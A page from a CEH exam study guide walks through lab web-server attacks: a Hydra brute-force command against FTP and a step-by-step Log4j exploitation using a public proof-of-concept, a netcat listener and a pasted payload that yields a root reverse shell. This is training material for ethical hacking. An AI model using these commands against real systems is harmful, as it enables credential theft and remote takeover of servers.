CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Crack FTP credentials using Hydra
  • 2. Gain Access to Target Web Server by Exploiting Log4j Vulnerability
  • Install Docker
  • Build the docker Image
  • Start the vulnerable server
  • Exploitation

Was this helpful?

  1. Module 13. Hacking Web Servers

2. Perform Webserver attacks

An ethical hacker or pen tester must test the company’s web server against various attacks and other vulnerabilities

Previous1. Footprint the WebserverNext3. Perform a Web Server Hacking using AI

Last updated 2 months ago

Was this helpful?

1. Crack FTP credentials using Hydra

Hydra -L users.txt -P passwords.txt ftp://192.168.18.2

2. Gain Access to Target Web Server by Exploiting Log4j Vulnerability

Install Docker

sudo apt-get update
sudo apt-get install docker.io 

Build the docker Image

docker build -t log4j-shell-poc 

-t: specifies allocating a pseudo-tty.

Start the vulnerable server

docker run --network host log4j-shell-poc

Exploitation

Scan the IP

nmap -sV -sC 10.10.1.9
  1. From the result we can see that port 8080 is open and Apache Tomcat/Coyote 1.1 server is running on the target system.

  2. Upon investigation we can see that Apache is vulnerable to Remote Code Execution (RCE) attack. Now we wil use searchsploit to find the vulnerabilities pertaining to RCE attack on the target server.

  3. In the terminal window run searchsploit -t Apache RCE command to view the RCE vulnerabilities on the Apache server.

  4. Now, we need to select a vulnerability to exploit the Server from the list, from the Nmap scan we found that the Apache Tomcat server is running on JSP so we will target java vulnerabilities from the list of vulnerabilities.

  5. We can see that Java platform is vulnerable for Apache Log4j 2 - Remote Command Execution (RCE) exploit.

  6. We will now exploit Log4j vulnerability present in the target Web Server to perform Remote code execution.

  7. Click the Firefox icon at the top of Desktop, to open a browser window.

  8. In the address bar of the browser, type http://10.10.1.9:8080 and press Enter.

  9. As we can observe that the Log4j vulnerable server is running on the Ubuntu machine, leave the Firefox and website open.

  10. Switch to the Terminal window, run cd log4j-shell-poc/ and press Enter, to enter into log4j-shell-poc directory.

  11. Now, we needed to install JDK 8, to do that open a new terminal window and type sudo su and press Enter to run the programs as a root user.

    In the [sudo] password for attacker field, type toor as a password and press Enter.

  12. We need to extract JDK zip file which is already placed at /home/attacker location.

  13. Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter, to extract the file.

    -xf: specifies extract all files.

  14. Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type mv jdk1.8.0_202 /usr/bin/ and press Enter.

  15. Now, we need to update the installed JDK path in the poc.py file.

  16. Navigate to the previous terminal window. In the terminal, type pluma poc.py and press Enter to open poc.py file.

  17. In the poc.py file scroll down and in line 62, replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.

  18. Scroll down to line 87 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.

  19. Scroll down to line 99 and replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.

  20. After making all the changes save the changes and close the poc.py editor window.

  21. Now, open a new terminal window and type nc -lvp 9001 and press Enter, to initiate a netcat listener as shown in screenshot.

  22. Switch to previous terminal window and type python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001 and press Enter, to start the exploitation and create payload.

  23. Now, copy the payload generated in the send me: section.

  24. Switch to Firefox browser window, in Username field paste the payload that was copied in previous step and in Password field type password and press Login button as shown in the screenshot.

    In the Password field you can enter any password.

  25. Now switch to the netcat listener, you can see that a reverse shell is opened.

  26. In the listener window type pwd and press Enter, to view the present working directory.

  27. Now, type whoami and press Enter.

  28. We can see that we have shell access to the target web application as a root user.

  29. The Log4j vulnerability takes the payload as input and processes it, as a result we will obtain a reverse shell.

Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
Logo